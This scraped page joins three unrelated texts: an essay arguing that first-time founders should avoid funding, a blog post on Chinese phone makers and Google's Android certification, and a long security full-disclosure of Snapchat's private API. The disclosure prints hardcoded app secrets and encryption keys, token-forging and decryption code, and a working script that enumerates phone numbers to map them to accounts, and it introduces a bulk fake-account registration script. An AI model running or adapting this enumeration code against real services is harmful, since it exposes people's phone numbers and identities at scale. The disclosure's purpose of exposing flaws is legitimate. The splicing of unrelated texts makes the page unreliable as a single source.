It's no secret that I'm a fan of bootstrapping. I like to retain 100% founder control of a business that I'm in. There are some circumstances where I'd consider raising capital (as a springboard, not a cushion), for the right kind of business, but I think they apply only to a very small subset of businesses that are interesting (aka fun to run) or likely, and to a vanishingly small subset of businesses by first-time founders.

That said, I do regard both methods - bootstrapped and funded - as valid ways to build a business. It all depends on your objectives and your circumstances. You couldn't start Google without funding, nor could you grow it to be the success it was. Facebook needed to own the social networking space before it could generate money, so it needed funding too. Even Apple, the cash cow par excellence, needed funding to help jumpstart its manufacturing operations (though nowadays, they'd probably have used Kickstarter). Some businesses are just capital-intensive. Some have a winner-takes-all kind of market where you must be funded to win. Some just don't have an obvious business model upfront.

Every once a while, though, I speak to someone about funding, in the context of a business that should be cash-generating fairly early, or is already generating decent amounts of cash, and they mention that they're looking for funding to decrease their risk. That's a terrible misconception. Funding does not decrease your personal or your business risk - it increases both.

Risk profile

Taking funding makes your distribution of possible results more binary. By default, a business can be anything from a complete failure (0% or even negative ROI) to a roaring success, with all the options in between available. If you raise funding, however, it cuts out a number of the middle options. VCs will definitely want an exit, and if the exit is too low, this can turn a fairly decent success into a relative failure for the entrepreneur.

For example, building a business worth £20m is a pretty amazing achievement, but if you've raised £10m from a VC to get there, with 2x preferential rights you would be wiped out and result in very little money for you as a founder. In that scenario, not taking the funding and building a, say, £5m business instead, would have been a far better financial outcome for the founder.

Angels can be a bit more forgiving, but they're typically looking to exit too, and taking that first bit of funding will gently push you down the road towards taking more and more. Angel funding does not necessarily make the outcome entirely binary (angels are more forgiving if you decide to just run your business and pay dividends), but it can still make a great first business success seem like a failure.

Remember, the VCs, despite all the rosy-coloured articles out there, are not in business to help you. They're in business to make money for themselves and their limited partners. Some do so in more ethical and helpful ways than others, and that's to be commended, but the fundamental business model of the VC is to get a good return on a few superstar investment and limit the damage as much as possible on all the other "failures".

No pain no gain

If funding makes things so much more risky, why bother at all?

Funding is worth taking when you want to trade additional risk for potentially larger gains. Talking of the "startup lottery" is not so far off the mark. Investment is a bit like gambling. When you raise funds, you take on a larger risk, both personally and on behalf of the company, in exchange for a potentially larger return.

If there was any way to increase return without increasing risk, everyone would have done it already (and in fact there are many ways, like getting mentors, learning about the topic, etc).

With this perspective, it becomes obvious when funding is a good idea: you should only take additional risk when you can afford it.

Most first-time founders are broke. Not only that, but being first-time founders, they are already carrying enormous amounts of risk, because they don't know how to run any kind of business, let alone a mega-successful high-growth tech startup. This is as compared with, for example, someone who has run and profitably exited a couple of more traditional businesses in the past, and is now looking for a new challenge. That experienced entrepreneur may be willing to trade some additional risk for a chance of a much larger impact than her previous ventures.

Given these circumstances, I would argue that new founders should be looking to decrease their risk, not increase it. As a first-time founder, it is better to have a risk curve that gives you a 30%-ish chance of making a fair bit more money than you were making in your previous job, with a fairly smooth distribution of lower outcomes and little chance of zero return (not that unlikely in my opinion), than a risk curve that gives you a large chance of zero return and a slightly higher chance of a very large outcome.

And therefore, first-time founders should almost never take funding.

If you read this far, you should get more similar articles by email.

Back in June I wrote about the China branded OEMs as the last big ‘swing vote bloc’ in the handset market. These vendors which contribute so much to global handset volumes have not fully voted on which mobile operating system to adopt. For the most part, they have embraced Android. Admittedly, there are very few other options. Except in China where many of the mobile Internet companies have dipped their toe in the mobile OS space through re-skinned versions of Android.

However, on my recent visit, I started to hear complaints about how this was working. The smaller OEMs are all having a hard time getting any help from Google. And by help, I mean the ability to comply with Google’s compatibility tests needed to become a certified Android handset.

This is a subject I have covered extensively in the past. Google offers the Android codebase for free download, but this is only part of the software needed to make a phone viable. To get full access to Google’s offering, handset vendors need to meet a variety of tests and sign an agreement with Google. In particular, Google has used access to its other sites as the key negotiating component. You can build a phone using the free-to-download version of Android, but if you want that phone to access G-Mail, Google Maps and in particular, the Google Play app store, then you need to be fully compliant with Google. Let me introduce some acronyms. The set of Google apps in question is known as the ‘G-Suite’ and the compliance regime is called GMA in China. (I admit, I am not sure what that stands for as there have been several compliance regimes over the years.) Put simply, to get into the G-Suite you need to sign up for GMA.

The trick is that GMA is only available to people with a direct relationship with Team Android. For reasons that are not entirely clear, this team has not engaged directly with the China OEMs. My best guess is that the Android GMA team is very small and simply lacks the bandwidth to deal with approving devices from dozens if not hundreds of small vendors. To some degree, they farm out that work to their chipset partners like Qualcomm and Mediatek, but it appears that Google has not fully delegated the GMA to the baseband providers, preferring to keep that power firmly rested in Mountain View. And to be fair, it is no easy task for Google to operate in China. That being said, all the OEMs we spoke with said they would be happy to sign agreements in Hong Kong, which after all is just over the border from Shenzhen.

The net result of all this is that the small vendors, who collectively ship several hundred million phones a year, have to make do. If you buy a phone on the streets of Shenzhen, even a device with no obvious branding on it, you are probably getting a phone that has access to the full G-Suite. My contacts tell me that ‘cracked’ G-Suite keys are readily available in China.

So here we come to the crux of the problem. Android wants to use the G-Suite to control Android as best as they can. But corporate Google just wants billions of people to have ready access to all of Google’s offerings. The compromise in China means cracked software codes, and all the security implications that those likely entail.

One OEM told me that he had tried repeatedly to reach out to Google but got no response. I found this story very resonant, as it was exactly what they told me four years ago about Microsoft. Before Android became a big hit, the China OEMs were hoping to work with Microsoft, a brand they knew well. But they got the same cold shoulder. I am not suggesting that Android is going to go the way of Windows Mobile, but a little bit of work on the part of Android and Google could go a long way to sealing up a very significant constituency.

TOC ¶

Foreword and notes ¶

Given that it's been around four months since our last Snapchat release, we figured we'd do a refresher on the latest version, and see which of the released exploits had been fixed (full disclosure: none of them). Seeing that nothing had been really been improved upon (although, stories are using AES/CBC rather than AES/ECB, which is a start), we decided that it was in everyone's best interests for us to post a full disclosure of everything we've found in our past months of hacking the gibson.

In the time since our previous release, there have been numerouspublicSnapchatapiclients created on GitHub. Thankfully, Snapchat are too busy declining ridiculously high offers from Facebook and Google, and lying to investors (hint: they have no way to tell the genders of their users, see /bq/register for a lack of gender specification) to send unlawful code takedown requests to all the developers involved.

As always, we're contactable via @gibsonsec and [email protected]. Merry Gibsmas!

Technical mumbo-jumbo ¶

This documentation is based on the current build (4.1.01 at the time of writing 23-12-2013) of Snapchat for Android. The Android app uses a mixture of /ph and /bq endpoints - the iOS app is pure /bq, but we haven't documented them all, sorry!

You can use api.snapchat.com, feelinsonice.appspot.com or feelinsonice-hrd.appspot.com as hosts for the API endpoints - they're all the same address at the end of the day.

The documentation may be broken, incomplete, outdated or just plain wrong. We try our best to keep things valid as much as possible, but we're only human after all.

NB! As of the current time of writing, there are two unknown reply fields scattered around the API responses. These are marked with an N/A - explanations welcome to [email protected]. Fields with an asterisk after them (e.g: zipped*) means it's an optional field.

Authentication tokens ¶

Authentication with Snapchat's API is done via a token sent in each request under the name req_token.

In general, it is a combination of two hashes (each salted with the secret), as defined by a specific pattern. You'll be using your normal auth_token for most requests - a few require a static token, which we'll get to in a bit.

Here is some example Python that implements the secret req_token hash:

defrequest_token(auth_token,timestamp):secret="iEk21fuwZApXlz93750dmW22pw389dPwOk"pattern="0001110111101110001111010101111011010001001110011000110001000110"first=hashlib.sha256(secret+auth_token).hexdigest()second=hashlib.sha256(str(timestamp)+secret).hexdigest()bits=[first[i]ifc=="0"elsesecond[i]fori,cinenumerate(pattern)]return"".join(bits)# Here's a benchmark to make sure your implementation works:# >>> request_token("m198sOkJEn37DjqZ32lpRu76xmw288xSQ9", 1373209025)# '9301c956749167186ee713e4f3a3d90446e84d8d19a4ca8ea9b4b314d1c51b7b'

• Things to note:
• The secret is iEk21fuwZApXlz93750dmW22pw389dPwOk
• You need twosha256 hashes. secret + auth_token timestamp + secret
• The pattern is 0001110111101110001111010101111011010001001110011000110001000110
  • 0 means take a character from hash 1 at the point.
  • 1 means take a character from hash 2 at the point.

Creating request tokens ¶

To create a request token (which you will need for 90% of requests), you need to:

• Take the auth_token you got from logging in
• Take the current timestamp (epoch/unix timestamp) which you'll need for the req_token and inclusion in the request.
• Run request_token(auth_token, timestamp)
• Include it in your request!

Creating static tokens ¶

If you're logging in, you won't have an auth_token yet. Not to fear!

• Take the static token, m198sOkJEn37DjqZ32lpRu76xmw288xSQ9
• Take the current timestamp
• Run request_token(static_token, timestamp)
• Include it in your request!

Common fields ¶

There are a few fields that are common to most requests and responses:

Requests:

Responses:

Encrypting/decrypting data ¶

Encrypting normal snaps ¶

• All standard media (read: picture and video) data sent to Snapchat is:
• Padded using PKCS#5.
• Encrypted using AES/ECB with a single synchronous key: M02cnQ51Ji97vwT4

Encrypting stories ¶

• Stories are:
• Padded using PKCS#7.
• Encrypted using AES/CBC with a unique IV and key per piece of the story (i.e, there isn't a single key/IV you can use).
  • You can find a media_key and media_iv deep within the return values of a request to /bq/stories.
• The server does the AES/CBC encryption - segments are sent to the server using the normal AES/ECB (M02c..) encryption.
  • StoryEncryptionAlgorithm#encrypt just calls SnapEncryptionAlgorithm#encrypt.

Here's a rough idea of how to decrypt them:

# To find `media_key` and `media_iv`, see: /bq/stories documentationimportrequestsimportbase64importmcryptres=requests.post(...)# POST /bq/stories and ensure res is a dict.data=requests.get(...)# GET /bq/story_blob?story_id=XXXXX from resultkey=base64.b64decode(res[...]["media_key"])iv=base64.b64decode(res[...]["media_iv"])m=mcrypt.MCRYPT("rijndael-128","cbc")m.init(key,iv)dedata=m.decrypt(data)# Boom.

Index of constants ¶

These are just some constants you'll undoubtedly come across working with Snapchat.

- static_token
`m198sOkJEn37DjqZ32lpRu76xmw288xSQ9`
Used to create a req_token to log in to an account.
- ENCRYPT_KEY_2
`M02cnQ51Ji97vwT4`
Used to encrypt/decrypt standard snap data (using AES/ECB)
- req_token pattern
`0001110111101110001111010101111011010001001110011000110001000110`
Used to create a valid req_token. `0` means $hash1, `1` means $hash2.
Where: $hash1 = sha256(secret + auth_token) and
 $hash2 = sha256(timestamp + secret)
- req_token secret
`iEk21fuwZApXlz93750dmW22pw389dPwOk`
Used to salt the hashes used in generating req_tokens.
- various media types:
IMAGE = 0
VIDEO = 1
VIDEO_NOAUDIO = 2
FRIEND_REQUEST = 3
FRIEND_REQUEST_IMAGE = 4
FRIEND_REQUEST_VIDEO = 5
FRIEND_REQUEST_VIDEO_NOAUDIO = 6
- various media states:
NONE = -1
SENT = 0
DELIVERED = 1
VIEWED = 2
SCREENSHOT = 3
- Snapchat's User-agent:
`Snapchat/<snapchat-build> (<phone-model>; Android <build-version>; gzip)`
e.g.: `Snapchat/4.1.01 (Nexus 4; Android 18; gzip)`
This isn't constant per se, but you should send it in your requests anyway.
Get the Android build version from here: http://developer.android.com/reference/android/os/Build.VERSION_CODES.html (18 is Jelly Bean 4.3, for example)
NB! Snapchat will fake the `<snapchat-build>` as `3.0.2` if it can't figure out its own build. So you can use that if you'd like.

Gzipping data ¶

NB! We're sort of hazy on the details and specifics of when you can and can't send gzipped data. Some endpoints appear to support it, others don't. We tried various combinations of encryption, gzipping and other combinations thereof, but got inconsistent results. Your mileage may vary.

Specific fields (mainly snap upload related, as expected) are sent gzipped (if it's supported). This means, where you see a data field, you can sometimes (it's inconsistent) gzip the data, send it as data and set zipped: 1 (note: it's still encrypted prior to gzipping).

How you gzip data will vary in your language, but in Python, it's as easy as:

fromStringIOimportStringIOimportgzipzipped=StringIO()gz=gzip.GzipFile(fileobj=zipped,mode="w")gz.write(encrypted_snap_data)gz.close()# Send this as `data`, with `zipped: 1`:gzdata=zipped.getvalue()

Registering an account (/bq/register, /ph/registeru) ¶

Actually registering (/bq/register) ¶

{timestamp:1373207221,req_token:create_token(static_token,1373207221),email:"[email protected]",password:"password",age:19,birthday:"1994-11-15"}

If your request is successful, you'll see something like this:

{token:"10634960-5c09-4037-8921-4c447a8c6aa9",email:"[email protected]",snapchat_phone_number:"+15557350485",logged:true}

NB! Even though your request failed (as indicated by logged), you'll still get a 200 OK reply.
If your request failed, you'll see something like this:

{message:"[email protected] is already taken! Login with that email address or try another one",logged:false}

Attaching a username (/ph/registeru) ¶

{timestamp:1373207221,req_token:create_token(static_token,1373207221),email:"[email protected]",username:"youraccount"}

If your request succeeded, you'll see something similar to logging in (/bq/login).
If your request failed, you'll see something like:

{message:"Invalid username. Letters and numbers with an optional hyphen, underscore, or period in between please!",logged:false}

Logging in (/bq/login) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(static_token,1373207221),password:"yourpassword"}

If your reply was successful, you'll get back something like this:

{bests:["someguy"],score:0,number_of_best_friends:1,received:0,logged:true,added_friends:[{ts:1384417608610,name:"somedude",display:"",type:0},{ts:1385130955168,name:"random",display:"",type:1}],beta_expiration:0,beta_number:-1,requests:[{display:"",type:1,ts:1377613760506,name:"randomstranger"}],sent:0,story_privacy:"FRIENDS",username:"youraccount",snaps:[{id:"894720385130955367r",sn:"someguy",ts:1385130955367,sts:1385130955367,m:3,st:1},{id:"116748384417608719r",sn:"randomdude",ts:1384417608719,sts:1384417608719,m:3,st:1},{id:"325924384416555224r",sn:"teamsnapchat",t:10,ts:1384416555224,sts:1384416555224,m:0,st:1}],friends:[{can_see_custom_stories:true,name:"teamsnapchat",display": Team Snapchat",type:0},{can_see_custom_stories:true,name:"someguy",display:"Some Guy",type:0},{can_see_custom_stories:true,name:"youraccount",display:"",type:1}],device_token:"",feature_settings:{},snap_p:1,mobile_verification_key:"MTMzNzpnaWJzb24=",recents:["teamsnapchat"],added_friends_timestamp:1385130955168,notification_sound_setting:"OFF",snapchat_phone_number:"+15557350485",auth_token:"85c32786-0c71-44bf-9ba0-77bf18c61db2",image_caption:false,is_beta:false,current_timestamp:1385378822645,can_view_mature_content:false,email:"[email protected]",should_send_text_to_verify_number:true,mobile:""}

added_friends is a list of:

requests is a list of:

snaps is a list of:

friends is a list of:

Logging out (/ph/logout) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),json:"{}",events:"[]"}

If your request was successful, you'll get back a 200 OK with no body content.
Doing this makes your authentication token stale - you can't reuse it.

Fetching snap data (/ph/blob) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),id:"97117373178635038r"}

If your request is successful, you will get 200 OK followed by the blob data for the snap you requested:

• The returned blob is encrypted. See: Encrypting/decrypting data
• Once decrypted, images will start with \xFF\xD8\xFF\xE0 - almost always JPEG.
• Once decrypted, videos will start with \x00\x00\x00\x18 - almost always MPEG-4.
• PNG (\x89PNG) and GIF (GIF8) are uncommon but can be sent by custom clients, as they appear to display correctly.

Your request may be met with 410 Gone if you requested an image that:

Uploading and sending snaps (/ph/upload, /ph/send) ¶

Sending snaps are done in two parts - you upload the media, then tell Snapchat who to send it to.

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221)media_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",type:0,data:ENCRYPTED_SNAP_DATA}

If your request was successful, you'll get a 200 OK with no body content.
NB! You need to store the media_id to use in /ph/send.

Sending it off (/ph/send) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),media_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",recipient:"teamsnapchat,someguy",time:5,zipped:"0"}

If your request was successful, you'll get a 200 OK with no body content.

Resending a failed snap (/ph/retry) ¶

/ph/retry is much like a combined endpoint for /ph/upload and /ph/send.

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),media_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f"type:0,data:ENCRYPTED_SNAP_DATA,zipped:"0",recipient:"teamsnapchat,someguy",time:5}

If your request was successful, you'll get a 200 OK with no body content.

Posting to a story (/bq/post_story) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),media_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",client_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",caption_text_display:"Foo, bar, baz!",thumbnail_data:ENCRYPTED_THUMBNAIL_DATA,zipped:"0",type:0,time:10}

NB! You get the media_id by first uploading your media.
NB! Your media_id and client_idhave to be in the format YOURACCOUNT~UUID - otherwise this will return 400 Bad Request.
If your request was successful, you'll get something like this back:

{json:{story:{caption_text_display:"Foo, bar, baz!",id:"youraccount~1385123930172",username:"youraccount",mature_content:false,client_id:"YOURACCOUNT~E5273F6E-EF69-453A-BE05-EC232AD7482C",timestamp:1385123930172,media_id:"5926704455352320",media_key:"rlcTSuolqwhiatuqT6533fbcyBvIU7e/i4ZFZPxFtco=",media_iv:"YXyO2gJ4PuLhwlHohxGOFE==",thumbnail_iv:"DrcQC5VRkjw+8KLp489xFA==",media_type:0,time:10.0,time_left:86399893,media_url:"https://feelinsonice-hrd.appspot.com/bq/story_blob?story_id=5676384469352890",thumbnail_url:"https://feelinsonice-hrd.appspot.com/bq/story_thumbnail?story_id=5911704785345329"}}}

If your request was successful you'll get back a 202 Accepted with some JSON body content:

r.json.story is a dictionary of:

Deleting story segments (/bq/delete_story) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),story_id:"youraccount~1382716927240"}

If your request was successful, you'll get back a 200 OK with no body content.

Appending segments to a story directly (/bq/retry_post_story) ¶

This is the same as posting to a story, however there is an extra field (data) sent:

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),media_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",client_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",caption_text_display:"Foo, bar, baz!",thumbnail_data:ENCRYPTED_THUMBNAIL_DATA,zipped:"0",type:0,time:10,data:ENCRYPTED_STORY_DATA}

If your request was successful, you'll get back something similar to posting to a story

Posting to a story and sending a snap (/bq/double_post) ¶

This is the same as sending a normal snap, however there are extra fields sent:

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),media_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",client_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",recipient:"teamsnapchat,someguy",caption_text_display:"Foo, bar, baz!",thumbnail_data:ENCRYPTED_THUMBNAIL_DATA,type:0,time:5}

If your request failed you'll most likely get a 400 Bad Request.
If your request was successful, you'll get something like this back:

{story_response:{json:{story:{caption_text_display:"Foo, bar, baz!",id:"youraccount~1385367025231",username:"youraccount",mature_content:false,client_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",timestamp:1385367025231,media_id:"6539144374653924",media_key:"/crVtkYOvpDOVA8C8MhR+qWlzFkFodQi+2iOAK84E+Q=",media_iv:"oBp82Gr0tGHfBzC42cyleg==",thumbnail_iv:"UvCn/A+2qrXchJG0J6gCSw==",media_type:0,time:5.0,time_left:86399908,media_url:"https://feelinsonice-hrd.appspot.com/bq/story_blob?story_id=6539144374653924",thumbnail_url:"https://feelinsonice-hrd.appspot.com/bq/story_thumbnail?story_id=6539144374653924"}},success:true},snap_response:{success:true}}

This reply is split into two portions: story_response and snap_response.
Both fields (story_response and snap_response) contain success, which is similar to the common field, logged.

story_response.json.story

Finding your friends (/ph/find_friends) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),countryCode:"US",numbers:"{\"2125554240\": \"Norm (Security)\", \"3114378739\": \"Stephen Falken\"}"}

{logged:true,results:[{name:"norman",display:"Norm (Security)",type:1},{name:"stephenfalken",display:"Stephen Falken",type:0}]}

The results field contains a list of maps each with three fields:

Making - or losing - friends (/ph/friend) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"add",friend:"someguy"}

NB! The action display requires an extra field called display, which is the display name you're applying to the user.
If your request was successful, you'll get something like this back:

{message:"someguy was blocked",param:"someguy",logged:true}

Getting your friends' best friends (/bq/bests) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),friend_usernames:"['teamsnapchat','another_username']",}

NB! Any usernames that are not on your friends list will be completely omitted from the response.
If the request was successful, you'll get a response similar to this:

{teamsnapchat:{best_friends:["friend_one","friend_two","friend_three"],score:100},another_username:{best_friends:["friend_one","friend_two","friend_three"],score:100}}

Getting your friends stories (/bq/stories) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221)}

If your request was successful, you'll get back something like this (hefty reply):

{mature_content_text:{title:"Content Warning",message:"The red exclamation mark on this Story indicates that Stories posted by this user may not be suitable for sensitive viewers. Do you wish to continue? After selecting 'Yes', you will never be prompted again.",yes_text:"Yes",no_text:"No"},my_stories:[{story:{id:"youraccount~1386362095231",username:"youraccount",mature_content:false,client_id:"YOURACCOUNT~e87a8f71-078b-4483-b051-b78f3d008717",timestamp:1386362095231,media_id:"6529624334955984",media_key:"/crVtkYOvpBAV08C8MhH+hWl4FDFodCi+2iOAK84E+Q=",media_iv:"oBp22Gr0t2HABDC4Wcylng==",thumbnail_iv:"UvCn/A+AqwXDCJG0Y6gCSw==",media_type:0,time:5.0,time_left:5885762,media_url:"https://feelinsonice-hrd.appspot.com/bq/story_blob?story_id=6529624334955984",thumbnail_url:"https://feelinsonice-hrd.appspot.com/bq/story_thumbnail?story_id=6529624334955984"},story_notes:[{viewer:"someguy",screenshotted:false,timestamp:1385367139674,storypointer:{"mKey":"story:{youraccount}:19841127","mField":"071025.221Z"}}],story_extras:{view_count:1,screenshot_count:0}},{story:{id:"youraccount~1386362095231",username:"youraccount",mature_content:false,client_id:"YOURACCOUNT~eb53ae24-7534-40e6-4a00-b611a90ab6c4",timestamp:1386362095231,media_id:"7799203240896396",media_key:"dvv5/CXFOwOkskitqrX/x2PkQarzHAbPMwkzM0aWHIY=",media_iv:"4hJppjXvdjjqIgjxG6vExQ==",thumbnail_iv:"rC4UM3bgGPTTg7ovzO1fug==",media_type:0,time:5.0,caption_text_display:"Hack the planet, hack the planet!",time_left:5658516,media_url:"https://feelinsonice-hrd.appspot.com/bq/story_blob?story_id=7799203240896396",thumbnail_url:"https://feelinsonice-hrd.appspot.com/bq/story_thumbnail?story_id=7799203240896396"},story_notes:[{viewer:"someguy",screenshotted:true,timestamp:1385366714056,storypointer:{"mKey":"story:{youraccount}:19841127","mField":"070637.986Z"}}],story_extras:{view_count:1,screenshot_count:0}}],friend_stories:[{username:"someguy",stories:[{story:{id:"someguy~1385439004799",username:"someguy",mature_content:false,client_id:"SOMEGUY~24823793-8333-4542-QF6C-D765CD6786D4",timestamp:1385452007799,media_id:"5549685943463504",media_key:"m1/kTyqt0E55jPyX+PexCP1++PUxTM6lqZC8kU/zcgI=",media_iv:"GvH/izpqBVBZQaAlmxWSSA==",thumbnail_iv:"Jx4tNSAaCuIkSX5DttTZJw==",media_type:0,time:10.0,zipped:false,time_left:86361636,media_url:"https://feelinsonice-hrd.appspot.com/bq/story_blob?story_id=5549685943463504",thumbnail_url:"https://feelinsonice-hrd.appspot.com/bq/story_thumbnail?story_id=5549685943463504"},viewed:false}]}]}

my_stories.story is a dictionary of:

my_stories.story_notes is a list of:

my_stories.story_notes.storypointer is a dictionary of:

my_stories.story_extras is a dictionary of:

friend_stories is a list of:

friend_stories.stories.story is a dictionary of:

Getting updates (/bq/updates) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221)}

If your request was successful, you'll get back something like a request from logging in.

Sending updates (/bq/update_snaps) ¶

This lets you report snaps as viewed or screenshotted.

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),added_friends_timestamp:1373206707,json:"{\"325922384426455124r\":{\"c\":0,\"t\":1385378843,\"replayed\":0}}",events:"[]"}

json is a string representation of a dictionary like:

events is a string representation of a list of dictionaries like:

If your request was successful, you'll get back a 200 OK with no body content.

Sending more updates (/bq/update_stories) ¶

This lets you report stories as viewed or screenshotted (much like above).

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),friend_stories:"[{\"id\":\"someguy~1385712923240\",\"screenshot_count\":0,\"timestamp\":1385712932690}]"}

friend_stories is a string representation of a list of dictionarys like:

If your request was successful, you'll get back a 200 OK with no body content.

Clearing your feed (/ph/clear) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221)}

If your request was successful, you'll get back a 200 OK with no body content.

Updating your account settings (/ph/settings) ¶

There are a few request fields that are consistent in use across /ph/settings:

Updating your birthday ¶

{username:"youraccount".timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updateBirthday",birthday:"02-25"}

If your request was successful, you'll get something like this back:

{logged:true,message:"Birthday updated",param:"0000-02-25"}

Updating your attached email ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updateEmail",email:"[email protected]"}

If your request was successful, you'll get something like this back:

Updating your account privacy ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updatePrivacy",privacySetting:"1"}

If your request was successful, you'll get something like this back:

{logged:true,message:"Snap privacy updated",param:"1"}

Updating your story privacy ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updateStoryPrivacy",privacySetting:"EVERYONE"}

The privacy setting CUSTOM requires an extra field called storyFriendsToBlock:

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updateStoryPrivacy",privacySetting:"CUSTOM",storyFriendsToBlock:"['teamsnapchat','another_username']"}

If your request was successful, you'll get something like this back:

{logged:true,message:"Story privacy updated",param:"EVERYONE"}

Updating your maturity settings ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updateCanViewMatureContent",canViewMatureContent:true}

For some reason this never replies with anything other than a 200 OK with no body content.
If your request was successful (read: didn't break), you'll get a 200 OK with no body content.

Updating feature settings (/bq/update_feature_settings) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),settings:"{\"smart_filters\": false, \"visual_filters\": false, \"special_text\": true, \"replay_snaps\": false, \"front_facing_flash\": false}"}

If your request was successful, you'll get back a 200 OK with no body content.

Choosing your number of best friends (/bq/set_num_best_friends) ¶

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),num_best_friends:3}

If your request was successful, you'll get back something like this back:

{best_friends:["someguy","gibsec"]}

Obligatory exploit POCs ¶

What would our full disclosure be if not tied together with some obligatory proof of concept scripts? We've taken some of our favorite exploits and turned them into lovely POC scripts for you to tinker with and hack to your heart's content.

The find_friends exploit ¶

This is one of our personal favorites since it's just so ridiculously easy to exploit. A single request (once logged in, of course!) to /ph/find_friends can find out whether or not a phone number is attached to an account.

This is one of the things we initially wrote about in our previous release, approximately four months ago (at the time of writing)! They've yet to add any rate limiting to this, so we thought we'd add a non-watered down version of the exploit to this release; maybe Evan Spiegel will fix it when someone finds his phone number via this?

We did some back-of-the-envelope calculations based on some number crunching we did (on an unused range of numbers). We were able to crunch through 10 thousand phone numbers (an entire sub-range in the American number format (XXX) YYY-ZZZZ - we did the Z's) in approximately 7 minutes on a gigabit line on a virtual server. Given some asynchronous optimizations, we believe that you could potentially crunch through that many in as little as a minute and a half (or, as a worst case, two minutes). This means you'd be railing through as many as 6666 phone numbers a minute (or, in our worst case, 5000!).

Using the reported 8 million users in June as a rough estimate for Snapchat's user base (however, it will have undoubtedly exponentially grown since then), we can do some rough calculations on how long it would take to crunch through all of Snapchat's user base:

Given user_base = 8e6 (8 million), and a numbers crunchable per minute (ncpm) of approximately 6666, we can assume that it would take approximately 20 hours for one $10 virtual server to eat through and find every user's phone number (hours = user_base / (ncpm*60)). At our worst case of ncpm = 5000, it would take approximately 26.6 hours.

This is all assuming that user's phone numbers are:

• All incremental (e.g. (000) 000-0000, (000) 000-0001, ...)
• All American.

Evidently (fortunately?) this is not the case, however, it's sort of scary to think about, isn't it? Hopping through the particularly "rich" area codes of America, potential malicious entities could create large databases of phone numbers -> Snapchat accounts in minutes.

In an entire month, you could crunch through as many as 292 million numbers with a single server ((ncpm*60)*730, approximately 730 hours in a month). Add more servers (or otherwise increase your number crunching capabilities) and you can get through a seemingly infinite amount of numbers. It's unlikely Snapchat's end would ever be the bottleneck in this, seeing as it's run on Google App Engine, which (as we all know) is an absolute tank when it comes to handling load.

The following script will simply read a list of numbers from stdin, iterate through them and write any results to stdout.
Use it like: python2 find_friends.py $username $password < numbers.txt > results.txt

#!/usr/bin/env python2# python2 find_friends.py $username $password < numbers.txt > results.txtimportrequestsimporthashlibimportjsonimportsysdefrequest_token(auth_token,timestamp):secret="iEk21fuwZApXlz93750dmW22pw389dPwOk"pattern="0001110111101110001111010101111011010001001110011000110001000110"first=hashlib.sha256(secret+auth_token).hexdigest()second=hashlib.sha256(str(timestamp)+secret).hexdigest()bits=[first[i]ifc=="0"elsesecond[i]fori,cinenumerate(pattern)]return"".join(bits)numbers=sys.stdin.read().split("\n")base="https://feelinsonice.appspot.com"r=requests.post(base+"/bq/login",data={# These are hardcoded, just because it's easy."req_token":"9301c956749167186ee713e4f3a3d90446e84d8d19a4ca8ea9b4b314d1c51b7b","timestamp":1373209025,"username":sys.argv[1],"password":sys.argv[2]},headers={"User-agent":None})auth_token,username=r.json()["auth_token"],r.json()["username"]# We can hardcode these as well.static={"req_token":request_token(auth_token,1373209025),"countryCode":"US","timestamp":1373209025,"username":username}fornumberinnumbers:n=json.dumps({number:"J. R. Hacker"})r=requests.post(base+"/ph/find_friends",data=dict(static,numbers=n),headers={"User-agent":None}).json()iflen(r["results"])<1:continuesys.stdout.write("{0} -> {1}\n".format(number,r["results"][0]["name"]))sys.stdout.flush()

Bulk registration of accounts ¶

This isn't so much of an exploit as taking advantage of the really lax registration functionality. Two requests, /bq/register and /ph/registeru can give you an account.

This script reads a list of accounts from stdin, attempts to register them, then prints the valid registered accounts to stdout. Format your account list like this:

account1:password1:[email protected]
account2:password2:[email protected]
account3:password3:[email protected]
... ad infinitum

Use it like: python2 bulk_register.py < accounts.txt > registered.txt

